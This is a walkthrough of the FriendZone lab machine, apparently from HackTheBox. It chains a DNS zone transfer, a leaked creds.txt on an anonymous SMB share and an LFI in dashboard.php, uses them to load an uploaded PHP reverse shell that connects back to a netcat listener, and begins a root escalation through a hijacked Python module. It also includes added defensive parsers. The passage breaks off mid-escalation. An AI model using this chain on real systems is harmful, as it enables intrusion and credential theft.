FriendZone
Reconnaissance: NMAP
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.123
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Aggressive OS guesses: Linux 3.2 - 4.9 (96%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.18 (94%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 4.10 (93%), Linux 4.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), Linux 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -39m59s, deviation: 1h09m15s, median: -1s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2024-01-08T04:58:12+02:00
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2024-01-08T02:58:12
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.15 seconds
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.123
53/udp open domain
113/udp open|filtered auth
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
21847/udp open|filtered netspeak-cs
36669/udp open|filtered unknown
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.123
┌──(kali💀kali)-[~/Desktop]
└─$ nmap --script smb-enum-shares.nse -p445 10.10.10.123
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 01:24 EST
Nmap scan report for friendzoneportal.red (10.10.10.123)
Host is up (0.47s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
HTTP Port 80/tcp
I always start off with enumerating HTTP first. In this case both 80 and 443 are open, so we’ll start there. We can see the contact email address is info@friendzoneportal.red, so friendzoneportal.red is a possible domain name. We’ll keep it in mind when enumerating DNS.
http://10.10.10.123/ info@friendzoneportal.red
View the source code to see if we can find any other information. view-source:http://10.10.10.123/
┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts
10.10.10.123 friendzoneportal.red
Gobuster:
┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.10.123/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt
/.php (Status: 403) [Size: 291]
/wordpress (Status: 301) [Size: 316] [--> http://10.10.10.123/wordpress/]
/robots.txt (Status: 200) [Size: 13]
/.php (Status: 403) [Size: 291]
Nikto:
┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.10.123/
- Nikto v2.5.0
+ Target IP: 10.10.10.123
+ Target Hostname: 10.10.10.123
+ Target Port: 80
+ Start Time: 2024-01-07 22:11:15 (GMT-5)
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 144, size: 577831e9005e6, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wordpress/: Directory indexing found.
+ 8048 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2024-01-07 23:13:07 (GMT-5) (3712 seconds)
Enumeration: HTTPS Port 443/tcp
Visiting the site over HTTPS (port 443) gives us an error.
https://10.10.10.123/
Not Found
The requested URL / was not found on this server.
Apache/2.4.29 (Ubuntu) Server at 10.10.10.123 Port 443
Therefore, let’s move on to enumerating DNS.
gobuster -k -u https://friendzone.red/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 20 -x txt,php
/admin (Status: 301)
/js (Status: 301)
/admin is an empty dir just like /wordpress was on http:
/js has something in it:
Going to https://friendzone.red/js/js/ gives a page:
https://friendzone.red/js/js/
Testing some functions !
I'am trying not to break things !
Z2pPVHFINUs4cTE3MDQ2OTUyMzNtejFyWVlBNUhT
The source reveals it also has some comments:
<p>Testing some functions !</p><p>I'am trying not to break things !</p>
S0s4ZGFJdjFibDE1NDk5MjIwMDJIbWt2TmtKZThr<!-- dont stare too much , you will be smashed ! , it's all about times and zones ! -->
This doesn’t have much meaning to me yet. Might be an allusion to DNS zones. Or it might just be a troll.
Enumeration: ISC BIND Port 53/tcp
ISC BIND 9.11.3-1ubuntu1.2
Try to get a domain name for the IP address using nslookup.
┌──(kali💀kali)-[~]
└─$ nslookup
> server 10.10.10.123
Default server: 10.10.10.123
Address: 10.10.10.123#53
We don’t get anything. However, we do have two possible domains from previous enumeration steps:
friendzone.red from the nmap scan, and
friendzoneportal.red from the HTTP website
Let’s try a zone transfer on both domains.
Zone transfer command: host -l <domain> <dns_server_address>
┌──(kali💀kali)-[~]
└─$ host -l friendzoneportal.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzoneportal.red has IPv6 address ::1
friendzoneportal.red name server localhost.
friendzoneportal.red has address 127.0.0.1
admin.friendzoneportal.red has address 127.0.0.1
files.friendzoneportal.red has address 127.0.0.1
imports.friendzoneportal.red has address 127.0.0.1
vpn.friendzoneportal.red has address 127.0.0.1
┌──(kali💀kali)-[~]
└─$ host -l friendzone.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzone.red has IPv6 address ::1
friendzone.red name server localhost.
friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1
Add all the domains/subdomains to the /etc/hosts file.
┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts
10.10.10.123 friendzoneportal.red
10.10.10.123 friendzone.red
10.10.10.123 friendzoneportal.red
10.10.10.123 admin.friendzoneportal.red
10.10.10.123 files.friendzoneportal.red
10.10.10.123 imports.friendzoneportal.red
10.10.10.123 vpn.friendzoneportal.red
10.10.10.123 administrator1.friendzone.red
10.10.10.123 hr.friendzone.red
10.10.10.123 uploads.friendzone.red
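The two transfers above are the finding that matters on this box: the BIND server answers AXFR for anyone who asks. As an added example (not part of the original write-up), here is a small parser for the text that `host -l <zone> <server>` prints. It turns the transfer into structured records, builds the /etc/hosts lines added by hand above, and lists the names the zone exposed. Run against your own authoritative servers, a non-empty result from the same function means they hand out the zone to unauthenticated clients. The sample input is copied from the output shown on this page; only A, AAAA and NS lines are handled.

```python
"""Parse `host -l` zone-transfer output into records, hosts lines and an exposure summary."""
import re
from collections import namedtuple

Record = namedtuple("Record", "name rtype value")

# Constructed sample: the two transfers captured above, concatenated.
SAMPLE_AXFR = """\
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzoneportal.red has IPv6 address ::1
friendzoneportal.red name server localhost.
friendzoneportal.red has address 127.0.0.1
admin.friendzoneportal.red has address 127.0.0.1
files.friendzoneportal.red has address 127.0.0.1
imports.friendzoneportal.red has address 127.0.0.1
vpn.friendzoneportal.red has address 127.0.0.1
friendzone.red has IPv6 address ::1
friendzone.red name server localhost.
friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1
"""

# One record per line: "<name> has address <ip>", "<name> has IPv6 address <ip>",
# "<name> name server <host>". Header lines (Using domain server:, Name:, ...) never match.
LINE_RE = re.compile(
    r"^(?P<name>\S+) (?:has (?P<type>IPv6 address|address)|(?P<ns>name server)) (?P<value>\S+)$"
)


def parse_axfr(text):
    """Return the records in the order the server sent them."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        if m.group("ns"):
            rtype = "NS"
        elif m.group("type") == "IPv6 address":
            rtype = "AAAA"
        else:
            rtype = "A"
        records.append(Record(m.group("name"), rtype, m.group("value")))
    return records


def hosts_lines(records, target_ip):
    """One /etc/hosts line per distinct name that has an A record, pointing at the scanned
    host (the zone's own A records all point at 127.0.0.1, which only resolves on the server)."""
    names = []
    for r in records:
        if r.rtype == "A" and r.name not in names:
            names.append(r.name)
    return ["%s %s" % (target_ip, n) for n in names]


def exposed_names(records):
    """Sorted, de-duplicated hostnames the transfer revealed; empty means AXFR was refused."""
    return sorted({r.name for r in records})


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    print("%d records, %d names exposed" % (len(recs), len(exposed_names(recs))))
    print("\n".join(hosts_lines(recs, "10.10.10.123")))
```

Feeding the function real `host -l` output from a pipe works the same way; the header block and the "Aliases:" line are ignored because they never match the record pattern.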
Now we start visiting the subdomains we found. Remember that we have to visit them over both HTTP and HTTPS because we’re likely to get different results.
The following sites showed us particularly interesting results.
https://admin.friendzoneportal.red/
https://administrator1.friendzone.red/
https://uploads.friendzone.red/
I tried default credentials on the admin sites but that didn’t work. Before we run a password cracker on those two sites, let’s enumerate SMB. We might find credentials there.
Enumeration: Ports 139/445/tcp: Samba smbd 4.7.6-Ubuntu
Run smbmap to list available shares and permissions.
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.123
[+] IP: 10.10.10.123:445 Name: friendzoneportal.red Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
We have READ access on the general share and READ/WRITE access on the Development share. List the content of the shares.
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.123 -r
[+] IP: 10.10.10.123:445 Name: friendzoneportal.red Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
./general
dr--r--r-- 0 Wed Jan 16 15:10:51 2019 .
dr--r--r-- 0 Tue Sep 13 10:56:24 2022 ..
fr--r--r-- 57 Tue Oct 9 19:52:42 2018 creds.txt
Development READ, WRITE FriendZone Samba Server Files
./Development
dr--r--r-- 0 Mon Jan 8 00:58:36 2024 .
dr--r--r-- 0 Tue Sep 13 10:56:24 2022 ..
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
-r: list the contents of the directory; by default, the root of every accessible share
The Development share does not contain anything, but the general directory has a file named creds.txt! Before we download the file, let’s use smbclient to view more information about the shares.
┌──(kali💀kali)-[~]
└─$ smbclient -L //10.10.10.123
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP FRIENDZONE
-L: look at what services are available on a server
The extra information this gives us over smbmap is the Comment column. We can see that the files in the Files share are stored in /etc/Files on the system. Therefore, there’s a good possibility that the files stored in the Development share (which we have WRITE access to) are stored in /etc/Development. We might need this piece of information in the exploitation phase.
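The nmap smb-enum-shares output earlier on this page already contains the two facts used here: which shares accept anonymous writes, and the server-side path behind each share. As an added example (not from the original write-up), the following parser pulls those facts out of nmap's text format and flags every disk share that is writable without credentials, with its path mapped back to Unix form. A defender can run the same check over scan output of their own file servers. The sample input is copied from the nmap output above.

```python
"""Flag anonymously writable SMB shares in nmap smb-enum-shares output."""
import re

# Constructed sample, copied from the nmap smb-enum-shares output shown above.
SAMPLE_NMAP_OUTPUT = r"""
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
"""

# A share header looks like \\host\share: (UNC path followed by a colon).
SHARE_RE = re.compile(r"^\\\\[^\\]+\\(?P<name>[^:]+):$")


def parse_shares(text):
    """Return {share_name: {field: value}} from the script's output."""
    shares = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("|_").strip()  # drop nmap's '|' / '|_' prefix
        if not line:
            continue
        m = SHARE_RE.match(line)
        if m:
            current = m.group("name")
            shares[current] = {}
            continue
        if current is not None and ": " in line:
            key, value = line.split(": ", 1)  # first ': ' only; 'C:\' has no space after the colon
            shares[current][key.strip()] = value.strip()
    return shares


def unix_path(nmap_path):
    """nmap renders Samba paths Windows-style (C:\\etc\\Development); map back to /etc/Development."""
    if re.match(r"^[A-Za-z]:\\", nmap_path):
        nmap_path = nmap_path[2:]
    return nmap_path.replace("\\", "/")


def anonymous_writable_shares(text):
    """Sorted (share, unix_path) pairs for disk shares whose anonymous access includes WRITE.
    IPC$ is a named-pipe endpoint rather than a file tree, so only STYPE_DISKTREE is considered."""
    findings = []
    for name, fields in parse_shares(text).items():
        if fields.get("Type") != "STYPE_DISKTREE":
            continue
        if "WRITE" in fields.get("Anonymous access", "").upper():
            findings.append((name, unix_path(fields.get("Path", ""))))
    return sorted(findings)


if __name__ == "__main__":
    for share, path in anonymous_writable_shares(SAMPLE_NMAP_OUTPUT):
        print("anonymous write: %s -> %s" % (share, path))
```

Note that nmap reports anonymous READ/WRITE on general while smbmap showed READ ONLY; the parser reports what the scan said, which is why both shares appear in its output and why a finding like this should be confirmed with a second tool, as the write-up does.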
Let’s get the creds.txt file. First, login anonymously (without a password) into the general share.
┌──(kali💀kali)-[~]
└─$ smbclient //10.10.10.123/general -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jan 16 15:10:51 2019
.. D 0 Tue Sep 13 10:56:24 2022
creds.txt N 57 Tue Oct 9 19:52:42 2018
-N: suppresses the normal password prompt from the client to the user
Download the creds.txt file from the target machine to the attack machine.
smb: \> get creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
https://admin.friendzoneportal.red/
https://admin.friendzoneportal.red/login.php
Admin page is not developed yet !!! check for another one
Also doesn’t work. Next, try the credentials on https://administrator1.friendzone.red/.
We’re in! Visit the /dashboard.php page.
https://administrator1.friendzone.red/dashboard.php
Smart photo script for friendzone corp !
* Note : we are dealing with a beginner php developer and the application is not tested yet !
image_name param is missed !
please enter it to show the image
default is image_id=a.jpg&pagename=timestamp
It seems to be a page that allows you to view images on the site. We’ll try to gain initial access through this page.
The dashboard.php page gives us instructions on how to view an image. We need to append the following to the URL.
?image_id=a.jpg&pagename=timestamp
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp
Final Access timestamp is 1704698027
Let’s put that timestamp number in the pagename URL parameter. After we do that we no longer get a “Final Access timestamp…” message.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=1704698027
During our enumeration phase, we found a URL that allows us to upload images. Let’s see whether the images we upload there can be viewed through the dashboard page.
https://uploads.friendzone.red/
https://uploads.friendzone.red/upload.php
Uploaded successfully !
1704698226
When we successfully upload the image random.jpg we get a timestamp. Let’s use the image and timestamp on the dashboard page.
https://administrator1.friendzone.red/dashboard.php?image_id=random.jpg&pagename=1704698226
┌──(kali💀kali)-[~/Desktop]
└─$ gobuster dir -k -u https://administrator1.friendzone.red -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php
/.php (Status: 403) [Size: 309]
/images (Status: 301) [Size: 349] [--> https://administrator1.friendzone.red/images/]
/login.php (Status: 200) [Size: 7]
/dashboard.php (Status: 200) [Size: 101]
Enumeration: FTP Port 21/tcp
vsftpd 3.0.3
Try the credentials on FTP.
┌──(kali💀kali)-[~]
└─$ ftp 10.10.10.123
Connected to 10.10.10.123.
220 (vsFTPd 3.0.3)
Name (10.10.10.123:kali): WORKWORKHhallelujah@#
Doesn’t work. Next, try SSH.
Enumeration: SSH Port 22/tcp
OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
┌──(kali💀kali)-[~]
└─$ ssh admin@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
admin@10.10.10.123's password:
Permission denied, please try again.
Also doesn’t work.
Shell as www-data
LFI
Based on the recon above, there’s likely a local file include (LFI) in this page. Both parameters have potential.
Nope, it doesn’t find the image. Let’s move our focus to the pagename parameter. It seems to be running a timestamp script that generates a timestamp and outputs it on the page. Based on the way the application currently behaves, my guess is that it takes the filename “timestamp”, appends “.php” to it, and then includes that script. Therefore, if this is vulnerable to LFI, it would be difficult to disclose arbitrary files, since the “.php” extension gets appended to whatever we supply.
Instead, let’s try first uploading a php file and then exploiting the LFI vulnerability to output something on the page. During the enumeration phase, we found that we have READ and WRITE permissions on the Development share and that it’s likely that the files uploaded on that share are stored in the location /etc/Development (based on the Comments column).
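The reasoning in the two paragraphs above (user input plus a fixed ".php" suffix becomes the include path; an absolute path to a writable location therefore works, while /etc/passwd does not) is easy to model. As an added example, not code from the write-up or from the target (dashboard.php itself is never shown), here is a Python model of that include pattern next to a hardened resolver that treats the request value as a key into an allowlist rather than as a path. WEB_ROOT and the allowed page names are assumptions; the curl to timestamp.php above is the only evidence for the include behaviour.

```python
"""Vulnerable include-path resolution (input + '.php') beside an allowlist-based version."""
import os

WEB_ROOT = "/var/www/administrator1"                          # assumed vhost root
ALLOWED_PAGES = frozenset({"timestamp", "dashboard", "login"})  # assumed allowlist


def resolve_include_vulnerable(pagename):
    """Mirrors include($_GET['pagename'] . '.php'): the request controls the whole path and only
    the suffix is fixed. Any readable .php file on disk can be included; a file like /etc/passwd
    cannot, because the server looks for /etc/passwd.php instead."""
    candidate = pagename + ".php"
    if os.path.isabs(candidate):                       # PHP uses an absolute path as-is
        return os.path.normpath(candidate)
    return os.path.normpath(os.path.join(WEB_ROOT, candidate))  # relative: under the script's dir


class RejectedPage(ValueError):
    """Raised by the hardened resolver for anything that is not an allowlisted page name."""


def resolve_include_hardened(pagename):
    """The request selects a key in a fixed table; it never becomes part of a filesystem path."""
    if not isinstance(pagename, str) or not pagename.isidentifier():
        raise RejectedPage("not a plain page name: %r" % (pagename,))
    if pagename not in ALLOWED_PAGES:
        raise RejectedPage("unknown page: %r" % (pagename,))
    return os.path.join(WEB_ROOT, pagename + ".php")


def escapes_web_root(resolved):
    """Detection helper: True when a resolved include path lies outside WEB_ROOT. Applying this
    to logged pagename values shows which requests would have reached files outside the site."""
    root = os.path.normpath(WEB_ROOT) + os.sep
    return not os.path.normpath(resolved).startswith(root)


def compare(pagename):
    """(vulnerable_path, escapes_root, hardened_result) for one request value."""
    vuln = resolve_include_vulnerable(pagename)
    try:
        hard = resolve_include_hardened(pagename)
    except RejectedPage as exc:
        hard = "rejected: %s" % exc
    return vuln, escapes_web_root(vuln), hard


if __name__ == "__main__":
    for value in ("timestamp", "../../../etc/passwd", "/etc/Development/anything"):
        print("%-30s -> %s" % (value, compare(value)))
```

The `../../../etc/passwd` case is the one the write-up reasons about: the vulnerable resolver produces `/etc/passwd.php`, which does not exist, so the traversal is "safe" only by accident; the hardened resolver rejects it and the absolute-path case for the same reason, without depending on what happens to be on disk.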
┌──(kali💀kali)-[~/Desktop]
└─$ curl -k https://administrator1.friendzone.red/timestamp.php
Final Access timestamp is 1704699293
Let’s create a simple test.php script that outputs the string “It’s working!” on the page.
<?php
echo "It's working!";
?>
Log into the Development share.
┌──(kali💀kali)-[~/Desktop]
└─$ smbclient //10.10.10.123/Development -N
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (3.3 kb/s) (average 3.3 kb/s)
┌──(kali💀kali)-[~/Desktop]
└─$ nc -nlvp 5555
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell
┌──(kali💀kali)-[~/Desktop]
└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.123] 39144
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
08:47:00 up 3:50, 0 users, load average: 0.02, 0.06, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
friend:x:1000:1000:friend,,,:/home/friend:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Debian-exim:x:107:114::/var/spool/exim4:/usr/sbin/nologin
ftp:x:108:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
bind:x:109:116::/var/cache/bind:/usr/sbin/nologin
Let’s upgrade it to a better shell.
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@FriendZone:/$
This gives us a partially interactive bash shell. To get a fully interactive shell, background the session (CTRL+Z) and run the following in your terminal, which tells your terminal to pass keyboard shortcuts through to the shell.
www-data@FriendZone:/$ cat home/friend/user.txt
cat home/friend/user.txt
69559f0496405776adaf3d141aa188bb
Priv: www-data to friend
In the /var/www/ directory there are folders for all the different sites, as well as a MySQL config file:
www-data@FriendZone:/etc/Development$ cd /var/www/
www-data@FriendZone:/var/www$ ls
ls
admin friendzoneportal html uploads
friendzone friendzoneportaladmin mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
Those creds happen to work for friend. I can either su friend:
SU:
www-data@FriendZone:/var/www$ su friend
su friend
Password: Agpyu12!0.213$
friend@FriendZone:/var/www$ whoami
friend
friend@FriendZone:/var/www$ id
uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
SSH:
or ssh in with them:
┌──(kali💀kali)-[~]
└─$ ssh friend@10.10.10.123
friend@10.10.10.123's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$
friend@FriendZone:~$ ls
user.txt
friend@FriendZone:~$ cat user.txt
69559-----------------------------
We have rwx privileges on the /etc/Development directory as www-data. So let’s upload the LinEnum script in the Development share.
┌──(kali💀kali)-[~/Desktop/7. Priv Esc]
└─$ smbclient //10.10.10.123/Development -N
Try "help" to get a list of possible commands.
smb: \> put LinEnum.sh
Give the script execute permissions.
chmod +x LinEnum.sh
I don’t seem to have execute permissions in that directory, so I’ll copy it to the tmp directory.
Navigate to the /tmp directory and try again.
cd /tmp/
chmod +x LinEnum.sh
That works, so the next step is to execute the script.
./LinEnum.sh
The results from LinEnum don’t give us anything that we could use to escalate privileges. So let’s try pspy. If you don’t have the script, you can download it from the following github repository.
Upload it and run it on the target machine in the same way we did for LinEnum.
Priv: friend to root
It seems that the reporter.py script is getting executed every couple of minutes as a scheduled task. Let’s view the permissions we have on that file.
friend@FriendZone:~$ ls -la /opt/server_admin/
total 12
drwxr-xr-x 2 root root 4096 Sep 13 2022 .
drwxr-xr-x 3 root root 4096 Sep 13 2022 ..
-rwxr--r-- 1 root root 424 Jan 16 2019 reporter.py
We only have read permission. So let’s view the content of the file.
friend@FriendZone:~$ cat /opt/server_admin/reporter.py
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
Here’s the source code of the script. Most of it is commented out, so there isn’t much to do there. It does import the os module, though. Maybe we can hijack that. Locate the module on the machine.
friend@FriendZone:~$ locate os.py
/usr/lib/python2.7/os.py
/usr/lib/python2.7/os.pyc
/usr/lib/python2.7/dist-packages/samba/provision/kerberos.py
